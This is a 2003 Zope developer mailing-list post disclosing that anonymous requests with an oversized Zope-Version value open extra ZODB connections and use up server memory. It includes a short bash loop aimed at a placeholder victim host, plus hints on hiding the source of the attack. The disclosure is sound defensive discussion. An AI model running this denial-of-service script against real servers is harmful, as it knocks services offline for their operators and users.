small summary and big plea was:(Re: [Zope-dev] Versions: should they die?)
Jamie Heilman
jamie@audible.transient.net
Fri, 6 Jun 2003 13:28:40 -0700
Oliver Bleutgen wrote:
> 2. Zope doesn't care if a correspondending Version instance to the value
> of REQUEST['Zope-Version'] exists, more exactly, zope doesn't care for
> the value of that Zope-Version variable at all.
Hmm, it doesn't care, but it does store it in memory. Pardon my fugly
non-portable bashisms here, but I just wanted to hash out an example:
#!/path/to/bash
exec >/dev/null
h='http://victim.example.com/'
for i in `seq 100`; do
w3m -dump -post <(perl -e 'print "Zope-Version=",$ARGV[0]x500000' $i) "$h"
done
Quick way to add 100 zodb connections and ~90M to the memory footprint
with relatively little clue of who is responsible assuming traditional
logging; presumeably one would get much trickier if they really wanted
to obfuscate the source of attack, slowly crawling the site, changing
the user-agent string, etc. Under sane resource limits the host is
spared however the /Control_Panel/Database/manage_cacheParameters
resource becomes unavailable due to memory constraints.
Other side-effects from allowing anonymous clients to open additional
zodb connections are as of yet unknown to me, anyone care to speculate
on other vectors of abuse?
--
Jamie Heilman http://audible.transient.net/~jamie/
"We must be born with an intuition of mortality. Before we know the words
for it, before we know there are words, out we come bloodied and squalling
with the knowledge that for all the compasses in the world, there's only
one direction, and time is its only measure." -Rosencrantz